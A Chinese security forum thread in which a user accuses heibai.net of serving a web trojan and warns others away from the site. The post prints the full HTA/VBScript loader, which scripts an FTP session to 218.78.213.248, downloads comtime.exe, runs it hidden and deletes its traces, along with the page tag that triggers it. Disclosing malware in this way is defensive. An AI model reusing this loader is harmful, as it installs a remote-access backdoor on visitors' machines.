|
 | 作者: 迷絮 [catmi]
 版主 |
登录 |
| 原文:
http://bbs.netxeyes.org/cgi-bin/ ... 27111000&see=-3 我是动鲨! 我说的黑白就是www.heibai.net,今天让我尤其的气愤! 今天我登陆黑白的时候发现在我的任务栏出现了一个最小化的程序,立刻又没有了!因为我前一段时间一直在做网页木马,意识到可能是最新的网页木马,立刻到我的缓存中去查找HTA脚本!果不其然!的确有! tt[1].hta很显然,他门在网页上安装了最新的网页木马! 这是HTA脚本的源码! <html> <HTA:APPLICATION caption=\"no\" border=\"none\" showInTaskBar=\"yes\" windowState=\"minimize\"> <object id=\'wsh\' classid=\'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B\'></object> <script language=\"VBScript\"> Dim fs, t Set fs = CreateObject(\"Scripting.FileSystemObject\") Set t = fs.CreateTextFile(\"ftp.txt\",True) t.WriteLine(\"open 218.78.213.248\") t.WriteLine(\"qwe\") t.WriteLine(\"qwe\") t.WriteLine(\"bin\") t.WriteLine(\"lcd c:\\\") t.WriteLine(\"get comtime.exe\") t.WriteLine(\"bye\") t.Close wsh.Run \"ftp -s:ftp.txt\",0,true wsh.Run \"c:\\comtime.exe\" fs.DeleteFile \"ftp.txt\",true window.close </script> </html> 大家可以很清楚的看到!他连接了218.78.213.248,并下载了comtime.exe这个后门,经过我的测试!这是一个反弹型木马!太狠毒了!太卑鄙了! 在他们的主页源吗中这句 <object data=\"http://218.78.213.248/hb/hb/tt.wmll\"></object> 正是调用木马的语句!!!!! 我真不知道这些人到底想作什么!我们只要一访问他的网页就要中木马!!! 痛骂黑白!・!!!!! 以上所言句句属实,如有半句假话,我以后退出这里! |
| 地主 发表时间: 09/28 12:51 |
 | 回复: IceFire [hbzq]  论坛用户 |
登录 |
|
恶意网站 人人得而诛之 米絮 我支持你!! |
| B1层 发表时间: 09/28 13:05 |
 | 回复: flyaway [flyaway]  论坛用户 |
登录 |
|
迷絮,有敬业精神,我支持你。 不过黑白是什么东东啊,好吃吗? 一天没吃饭了。 |
| B2层 发表时间: 09/28 13:09 |
 | 回复: zhhjohn [zhhjohn]  论坛用户 |
登录 |
|
同意~~昨天我也去了~~确实有哟 |
| B3层 发表时间: 09/28 13:29 |
 | 回复: disun [benww] 论坛用户 |
登录 |
|
我想黑白应该不会搞这种恶作剧的吧,可能有其他原因的。 |
| B4层 发表时间: 09/28 13:45 |
 | 回复: abomb [abomb]  论坛用户 |
登录 |
|
这样的好帖支持 我以后不在去黑白。NET |
| B5层 发表时间: 09/29 16:43 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: [转]去黑白的进来看看